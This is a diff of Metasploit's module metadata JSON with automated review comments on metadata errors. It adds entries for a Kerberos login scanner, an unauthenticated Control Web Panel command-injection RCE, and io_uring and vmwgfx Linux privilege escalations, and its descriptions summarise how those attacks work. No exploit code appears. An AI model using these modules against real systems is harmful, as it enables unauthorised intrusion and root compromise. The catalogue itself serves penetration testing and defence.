"fullname": "auxiliary/admin/ldap/rbcd",
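Review bot: the ticket_converter entry also has all three notes arrays empty; populate them in the module source so the generated metadata carries them. Adjacent but outside this change: the context line naming admin/ldap/rbcd "Role Base Constrained Delegation" should read "Resource-Based Constrained Delegation"; worth a follow-up fix to that module's name.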
@@ -6000,7 +6323,7 @@
"sybase"
],
"targets": null,
"mod_time": "2021-04-22 10:15:04 +0000",
"mod_time": "2022-06-29 12:20:37 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_idf",
@@ -18598,7 +18921,7 @@
],
"targets": null,
"mod_time": "2021-05-17 17:04:49 +0000",
"mod_time": "2023-01-17 18:59:12 +0000",
"path": "/modules/auxiliary/gather/get_user_spns.py",
"is_install_path": true,
"ref_name": "gather/get_user_spns",
@@ -19595,7 +19918,8 @@
"type": "auxiliary",
"author": [
"Matt Byrne <attackdebris@gmail.com>",
"alanfoster"
"alanfoster",
"sjanusz-r7"
],
"description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n the different responses returned by the service for valid and invalid users.",
"references": [
@@ -19611,12 +19935,12 @@
],
"targets": null,
"mod_time": "2022-04-08 18:45:03 +0000",
"mod_time": "2022-05-27 13:34:10 +0000",
"path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
"is_install_path": true,
"ref_name": "gather/kerberos_enumusers",
"check": false,
"post_auth": false,
"post_auth": true,
"default_credential": false,
"notes": {
},
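Review bot: post_auth flips from false to true here, but the kerberos_enumusers description in the preceding hunk still says it enumerates users "from an unauthenticated perspective". If the module gained an optional credential path, the description should say so; if the flip is a side effect of a shared mixin, it should be reverted so the metadata keeps advertising an unauthenticated module.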
@@ -19827,7 +20151,7 @@
"author": [
"Grant Willcox"
],
"description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n file containing custom queries to be executed using the RUN_QUERY_FILE action.\n If this action is specified, then QUERY_FILE_PATH must be a path to the location\n of this JSON/YAML file on disk.\n\n Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n to a comma seperated string containing the list of attributes they are interested in obtaining\n from the results.\n\n As a third option can run one of several predefined queries by setting ACTION to the\n appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n All results will be returned to the user in table, CSV or JSON format, depending on the value\n of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n should multiple items exist within a single column.",
"description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n file containing custom queries to be executed using the RUN_QUERY_FILE action.\n If this action is specified, then QUERY_FILE_PATH must be a path to the location\n of this JSON/YAML file on disk.\n\n Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n to a comma separated string containing the list of attributes they are interested in obtaining\n from the results.\n\n As a third option can run one of several predefined queries by setting ACTION to the\n appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n All results will be returned to the user in table, CSV or JSON format, depending on the value\n of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n should multiple items exist within a single column.",
"references": [
],
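Review bot: the "seperated" to "separated" fix is good, but the same gather/ldap_query description still reads "As a third option can run one of several predefined queries", which is missing its subject. Suggest "As a third option, users can run one of several predefined queries" while this string is being touched, so the generator does not need another pass for the same sentence.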
@@ -19841,7 +20165,7 @@
],
"targets": null,
"mod_time": "2022-12-04 17:41:24 +0000",
"mod_time": "2023-01-24 11:23:28 +0000",
"path": "/modules/auxiliary/gather/ldap_query.rb",
"is_install_path": true,
"ref_name": "gather/ldap_query",
@@ -21918,7 +22242,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-10-13 10:13:27 +0000",
"mod_time": "2022-12-07 23:03:57 +0000",
"path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
"is_install_path": true,
"ref_name": "gather/windows_secrets_dump",
@@ -32845,7 +33169,8 @@
"OSVDB-877",
"BID-11604",
"BID-9506",
"BID-9561"
"BID-9561",
"URL-https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS"
],
"platform": "",
"arch": "",
@@ -32866,7 +33191,7 @@
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-01-15 06:37:11 +0000",
"path": "/modules/auxiliary/scanner/http/options.rb",
"is_install_path": true,
"ref_name": "scanner/http/options",
@@ -38772,6 +39097,54 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/kerberos/kerberos_login": {
"name": "Kerberos Authentication Check Scanner",
"fullname": "auxiliary/scanner/kerberos/kerberos_login",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"alanfoster"
],
"description": "This module will test Kerberos logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n\n Kerberos accounts which do not require pre-authentication will\n have the TGT logged for offline cracking, this technique is known as AS-REP Roasting.\n\n It is also able to identify whether user accounts are enabled or\n disabled/locked out.",
"references": [
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2022-12-14 18:28:16 +0000",
"path": "/modules/auxiliary/scanner/kerberos/kerberos_login.rb",
"is_install_path": true,
"ref_name": "scanner/kerberos/kerberos_login",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"account-lockouts",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/llmnr/query": {
"name": "LLMNR Query",
"fullname": "auxiliary/scanner/llmnr/query",
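Review bot: the new auxiliary/scanner/kerberos/kerberos_login entry lands with an empty `references` list and an empty `Reliability` note. The description explicitly names AS-REP Roasting and the `SideEffects` already flag `account-lockouts` and `ioc-in-logs`; a reference for the technique and a Reliability value would let operators and blue teams judge the lockout risk of running this against a production domain before they read the module source.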
@@ -40288,7 +40661,7 @@
"sybase"
],
"targets": null,
"mod_time": "2021-08-31 17:10:07 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_login",
@@ -46440,7 +46813,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2023-01-09 11:23:26 +0000",
"mod_time": "2023-01-13 17:31:02 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumshares",
@@ -46564,7 +46937,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2021-08-31 17:10:07 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_login",
@@ -46746,7 +47119,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2023-01-12 09:29:53 +0000",
"mod_time": "2023-01-25 13:58:29 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_version.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_version",
@@ -50083,7 +50456,7 @@
"winrm"
],
"targets": null,
"mod_time": "2021-01-28 10:35:25 +0000",
"mod_time": "2022-11-30 11:32:23 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_auth_methods",
@@ -50133,7 +50506,7 @@
"winrm"
],
"targets": null,
"mod_time": "2021-09-10 15:13:30 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_cmd",
@@ -50184,7 +50557,7 @@
"winrm"
],
"targets": null,
"mod_time": "2021-09-24 12:01:30 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_login",
@@ -50234,12 +50607,12 @@
"winrm"
],
"targets": null,
"mod_time": "2021-01-28 10:35:25 +0000",
"mod_time": "2023-01-03 19:54:06 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_wql",
"check": false,
"post_auth": true,
"post_auth": false,
"default_credential": false,
"notes": {
},
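Review bot: `post_auth` changes from `true` to `false` for scanner/winrm/winrm_wql. A scanner that issues WQL queries over WinRM needs credentials to get anything back, so `false` looks like a side effect of an option rename in winrm_wql.rb rather than an intended change; please check what option change caused the generator to drop the flag, because the neighbouring winrm_cmd and winrm_login entries in this same diff are regenerated without touching it.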
@@ -57172,7 +57545,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-07-18 23:31:34 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/intel_sysret_priv_esc",
@@ -57228,7 +57601,7 @@
"FreeBSD 12.0-RELEASE r341666",
"FreeBSD 12.1-RELEASE r354233"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-02 18:45:43 +0000",
"path": "/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/ip6_setpktopt_uaf_priv_esc",
@@ -57236,6 +57609,9 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-os-restarts"
],
@@ -57336,7 +57712,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-08-24 11:47:50 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/rtld_execl_priv_esc",
@@ -60094,6 +60470,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/control_web_panel_login_cmd_exec": {
"name": "CWP login.php Unauthenticated RCE",
"fullname": "exploit/linux/http/control_web_panel_login_cmd_exec",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-05",
"type": "exploit",
"author": [
"Spencer McIntyre",
"Numan Türle"
],
"description": "Control Web Panel versions < 0.9.8.1147 are vulnerable to\n unauthenticated OS command injection. Successful exploitation results\n in code execution as the root user. The results of the command are not\n contained within the HTTP response and the request will block while\n the command is running.",
"references": [
"CVE-2022-44877",
"URL-https://github.com/numanturle/CVE-2022-44877",
"URL-https://control-webpanel.com/changelog#1674073133745-84af1b53-c121"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 2031,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-01-25 13:45:18 +0000",
"path": "/modules/exploits/linux/http/control_web_panel_login_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/control_web_panel_login_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/cpi_tararchive_upload": {
"name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
"fullname": "exploit/linux/http/cpi_tararchive_upload",
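Review bot: `rport` is 2031 for the new control_web_panel_login_cmd_exec entry, but `autofilter_ports` lists only the generic HTTP ports (80, 8080, 443, 8000, 8888, 8880, 8008, 3000, 8443), so automated target selection will never try the module's own default port. Either add 2031 to `autofilter_ports` in the module source or state in the module docs that RPORT must be set explicitly. Separately, `needs_cleanup` is `null` while `SideEffects` lists `artifacts-on-disk` for the "Linux Dropper" target; if the dropper leaves the payload behind, `needs_cleanup` should be `true` so incident responders know to look for it.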
@@ -72168,7 +72607,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/abrt_sosreport_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/abrt_sosreport_priv_esc",
@@ -72221,7 +72660,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -72281,7 +72720,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
@@ -72434,7 +72873,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/asan_suid_executable_priv_esc",
@@ -72590,7 +73029,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -72643,7 +73082,7 @@
"Linux x86",
"Linux x64"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_priv_esc",
@@ -72709,7 +73148,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_sign_extension_priv_esc",
@@ -72860,7 +73299,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-08-31 15:36:00 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -72916,7 +73355,7 @@
"x86_64",
"aarch64"
],
"mod_time": "2021-12-02 10:31:47 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2021_3493_overlayfs",
@@ -73040,7 +73479,7 @@
"x86",
"aarch64"
],
"mod_time": "2022-03-09 11:06:26 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2021_4034_pwnkit_lpe_pkexec",
@@ -73156,7 +73595,7 @@
"targets": [
"Ubuntu Linux 5.13.0-37"
],
"mod_time": "2022-04-21 07:44:40 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2022_0995_watch_queue.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2022_0995_watch_queue",
@@ -73180,6 +73619,63 @@
],
"needs_cleanup": true
},
"exploit_linux/local/cve_2022_1043_io_uring_priv_esc": {
"name": "io_uring Same Type Object Reuse Priv Esc",
"fullname": "exploit/linux/local/cve_2022_1043_io_uring_priv_esc",
"aliases": [
],
"rank": 500,
"disclosure_date": "2022-03-22",
"type": "exploit",
"author": [
"h00die",
"Ryota Shiga",
"Mathias Krause"
],
"description": "This module exploits a bug in io_uring leading to an additional put_cred()\n that can be exploited to hijack credentials of other processes.\n\n We spawn SUID programs to get the free'd cred object reallocated by a\n privileged process and abuse them to create a SUID root binary ourselves\n that'll pop a shell.\n\n The dangling cred pointer will, however, lead to a kernel panic as soon as\n the task terminates and its credentials are destroyed. We therefore detach\n from the controlling terminal, block all signals and rest in silence until\n the system shuts down and we get killed hard, just to cry in vain, seeing\n the kernel collapse.\n\n The bug affected kernels from v5.12-rc3 to v5.14-rc7.\n\n More than 1 CPU is required for exploitation.\n\n Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic",
"references": [
"URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
"URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
"URl-https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14",
"CVE-2022-1043"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2023-02-02 10:19:07 +0000",
"path": "/modules/exploits/linux/local/cve_2022_1043_io_uring_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2022_1043_io_uring_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true
},
"exploit_linux/local/desktop_privilege_escalation": {
"name": "Desktop Linux Password Stealer and Privilege Escalation",
"fullname": "exploit/linux/local/desktop_privilege_escalation",
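Review bot: two problems in the new cve_2022_1043_io_uring_priv_esc entry. First, the reference prefix on the kernel commit line is `URl-` instead of `URL-`; reference types are matched by exact string, so this entry will not render as a link and should be corrected in the module source before the metadata is regenerated. Second, `Stability` is `crash-safe`, yet the description states that the dangling cred pointer "will, however, lead to a kernel panic as soon as the task terminates"; that behaviour matches `crash-os-down`, which is what the sibling vmwgfx_fd_priv_esc entry in this same diff uses, not `crash-safe`.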
@@ -73253,7 +73749,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
@@ -73302,7 +73798,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/docker_daemon_privilege_escalation",
@@ -73457,7 +73953,7 @@
"targets": [
"Exim 4.87 - 4.91"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -73641,7 +74137,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/glibc_realpath_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_realpath_priv_esc",
@@ -73741,7 +74237,7 @@
"Linux x86",
"Linux x64"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/hp_xglance_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/hp_xglance_priv_esc",
@@ -73889,7 +74385,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ktsuss_suid_priv_esc",
@@ -73940,7 +74436,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
@@ -73990,7 +74486,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -74058,7 +74554,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:16:57 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
@@ -74292,7 +74788,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/network_manager_vpnc_username_priv_esc",
@@ -74383,7 +74879,7 @@
"targets": [
"Micro Focus (HPE) Data Protector <= 10.40 build 118"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -74655,7 +75151,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ptrace_sudo_token_priv_esc",
@@ -74704,7 +75200,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-11-12 16:19:50 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
"is_install_path": true,
"ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -74809,7 +75305,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -74866,7 +75362,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
@@ -74926,7 +75422,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/recvmmsg_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/recvmmsg_priv_esc",
@@ -74971,7 +75467,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
@@ -75075,7 +75571,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -75133,7 +75629,7 @@
"targets": [
"Linux x86"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/sock_sendpage.rb",
"is_install_path": true,
"ref_name": "linux/local/sock_sendpage",
@@ -75366,7 +75862,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
@@ -75421,7 +75917,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-12-01 14:34:09 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -75581,7 +76077,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/ufo_privilege_escalation",
@@ -75633,7 +76129,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-12-01 14:55:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
@@ -75698,7 +76194,7 @@
"Linux x86",
"Linux x64"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
"is_install_path": true,
"ref_name": "linux/local/vmware_alsa_config",
@@ -75829,6 +76325,62 @@
],
"needs_cleanup": null
},
"exploit_linux/local/vmwgfx_fd_priv_esc": {
"name": "vmwgfx Driver File Descriptor Handling Priv Esc",
"fullname": "exploit/linux/local/vmwgfx_fd_priv_esc",
"aliases": [
],
"rank": 400,
"disclosure_date": "2022-01-28",
"type": "exploit",
"author": [
"h00die",
"Mathias Krause"
],
"description": "If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to\n recover by deallocating the (already populated) file descriptor. This is\n wrong, as the fd gets released via put_unused_fd() which shouldn't be used,\n as the fd table slot was already populated via the previous call to\n fd_install(). This leaves userland with a valid fd table entry pointing to\n a free'd 'file' object.\n\n We use this bug to overwrite a SUID binary with our payload and gain root.\n Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.\n\n Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.",
"references": [
"URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
"URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
"CVE-2022-22942"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/vmwgfx_fd_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-down"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true
},
"exploit_linux/local/yum_package_manager_persistence": {
"name": "Yum Package Manager Persistence",
"fullname": "exploit/linux/local/yum_package_manager_persistence",
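Review bot: the references for the new vmwgfx_fd_priv_esc entry stop at the grsecurity write-up and the PoC repository; unlike the io_uring sibling entry above, the upstream fix commit is not listed. Adding it would let defenders map the stated 4.14-rc1 to 5.17-rc1 range onto patched distribution kernels instead of relying on the module's `check` result alone.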
@@ -77350,7 +77902,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2021-11-18 16:33:52 +0000",
"mod_time": "2022-06-23 16:28:10 +0000",
"path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -79253,7 +79805,7 @@
"targets": [
"Automatic"
],
"mod_time": "2022-04-18 09:36:52 +0000",
"mod_time": "2023-01-31 23:59:22 +0000",
"path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
"is_install_path": true,
"ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -79261,6 +79813,15 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
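Review bot: `SideEffects` is added as an empty array for linux/ssh/solarwinds_lem_exec, and the same empty list appears in the symantec_smg_ssh and vmware_vdp_known_privkey hunks that follow. All three authenticate over SSH to obtain a session, which leaves entries in the target's authentication logs, so `ioc-in-logs` seems warranted; if the empty list is deliberate, a comment in the module explaining why would save the next reviewer the same question.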
@@ -79298,7 +79859,7 @@
"targets": [
"Symantec Messaging Gateway 9.5"
],
"mod_time": "2022-04-18 09:36:52 +0000",
"mod_time": "2023-01-31 23:59:22 +0000",
"path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
"is_install_path": true,
